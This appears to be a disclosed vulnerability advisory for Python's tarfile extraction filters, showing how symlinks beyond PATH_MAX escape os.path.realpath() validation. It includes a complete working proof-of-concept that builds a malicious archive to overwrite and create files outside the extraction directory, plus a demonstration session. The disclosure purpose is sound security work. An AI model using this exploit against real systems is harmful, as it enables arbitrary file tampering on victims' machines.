Python's TarFile.extractall() and TarFile.extract() methods accept a filter argument intended to make extraction safer. The standard library provides two such filters, tar_filter ("tar") and data_filter ("data"), each applying a different set of checks to the archive members before they are extracted.
A bug occurs when a path containing symlinks is shorter than PATH_MAX, but becomes longer than PATH_MAX once os.path.realpath() substitutes the symlinks with their targets. Any symlinks that fall beyond PATH_MAX are not expanded.
os.path.realpath() is used by both the "tar" and "data" filters to validate the path, but no error is raised if PATH_MAX is exceeded, so the filter validates a partially resolved path. Later, during extractall() or extract(), the paths are used without passing them through os.path.realpath(), and the operating system follows the unexpanded symlinks.
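To make the length mismatch concrete, the following sketch computes the path lengths involved, using the component sizes from the PoC in this report. The PATH_MAX values (4096 on Linux, 1024 on macOS) are assumed typical values, and the helper name path_lengths is hypothetical.

```python
# Assumed limits: PATH_MAX is typically 4096 on Linux and 1024 on macOS.
PATH_MAX = {"linux": 4096, "darwin": 1024}
# Directory-name lengths used by the PoC on each platform.
COMPONENT_LEN = {"linux": 247, "darwin": 55}
STEPS = "abcdefghijklmnop"   # one single-character symlink per level
FINAL_LINK_LEN = 254         # length of the final symlink's name


def path_lengths(platform):
    """Return (stored, expanded) lengths of the path to the final symlink."""
    # As stored in the archive: "a/b/.../p/" followed by the final link name.
    stored = len("/".join(STEPS)) + 1 + FINAL_LINK_LEN
    # After each one-character symlink is replaced by its long directory
    # name (plus one separator per level).
    expanded_dirs = len(STEPS) * (COMPONENT_LEN[platform] + 1)
    return stored, expanded_dirs + FINAL_LINK_LEN


for platform in ("linux", "darwin"):
    stored, expanded = path_lengths(platform)
    print(platform, stored, expanded, expanded > PATH_MAX[platform])
```

Measured relative to the extraction directory, the stored path is 286 bytes on both platforms, while the expanded form is 4222 bytes on Linux and 1150 bytes on macOS. Both exceed the assumed limits even before the destination prefix is added, so the final symlink is never resolved during validation.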
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
Critical - Anyone using TarFile.extractall() or TarFile.extract() with filter="data" or filter="tar", directly or indirectly, must patch immediately or introduce other mitigating controls.
This proof-of-concept assumes it is being run under /home/username.
The tar file created in this PoC will modify the /home/username/flag/flag file that exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
    $ pwd
    /home/username
    $ mkdir flag
    $ echo "hello world" > flag/flag
    import tarfile
    import os
    import io
    import sys

    # 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896
    # on OSX), leaving 128 bytes for a prefix and at least a few chars of the link
    comp = 'd' * (55 if sys.platform == 'darwin' else 247)
    steps = "abcdefghijklmnop"
    path = ""

    with tarfile.open("poc.tar", mode="x") as tar:
        # populate the symlinks and dirs that expand in os.path.realpath()
        for i in steps:
            a = tarfile.TarInfo(os.path.join(path, comp))
            a.type = tarfile.DIRTYPE
            tar.addfile(a)
            b = tarfile.TarInfo(os.path.join(path, i))
            b.type = tarfile.SYMTYPE
            b.linkname = comp
            tar.addfile(b)
            path = os.path.join(path, comp)

        # create the final symlink that exceeds PATH_MAX and simply points to the
        # top dir. this allows *any* path to be appended.
        # this link will never be expanded by os.path.realpath(), nor anything after it.
        linkpath = os.path.join("/".join(steps), "l"*254)
        l = tarfile.TarInfo(linkpath)
        l.type = tarfile.SYMTYPE
        l.linkname = ("../" * len(steps))
        tar.addfile(l)

        # make a symlink outside to keep the tar command happy
        e = tarfile.TarInfo("escape")
        e.type = tarfile.SYMTYPE
        e.linkname = linkpath + "/../flag"
        tar.addfile(e)

        # use the symlinks above, that are not checked, to create a hardlink
        # to a file outside of the destination path
        f = tarfile.TarInfo("flaglink")
        f.type = tarfile.LNKTYPE
        f.linkname = "escape/flag"
        tar.addfile(f)

        # now that we have the hardlink we can overwrite the file
        content = b"overwrite\n"
        c = tarfile.TarInfo("flaglink")
        c.type = tarfile.REGTYPE
        c.size = len(content)
        tar.addfile(c, fileobj=io.BytesIO(content))

        # we can also create new files as well!
        content = b"new!\n"
        n = tarfile.TarInfo("escape/newfile")
        n.type = tarfile.REGTYPE
        n.size = len(content)
        tar.addfile(n, fileobj=io.BytesIO(content))
    $ pwd
    /home/username
    $ ls flag  # check the flag dir and file are unchanged
    flag
    $ cat flag/flag
    hello world
    $ mkdir test  # this is where the tar is extracted
    $ mkdir otherdir  # this is a dummy dir to keep everything clean
    $ cd otherdir
    $ python3
    Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> c
    >>> CTRL-D
    $ cd ..
    $ ls flag  # the flag dir is different!
    flag  newfile
    $ cat flag/flag
    overwrite
    $ cat flag/newfile
    new!
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025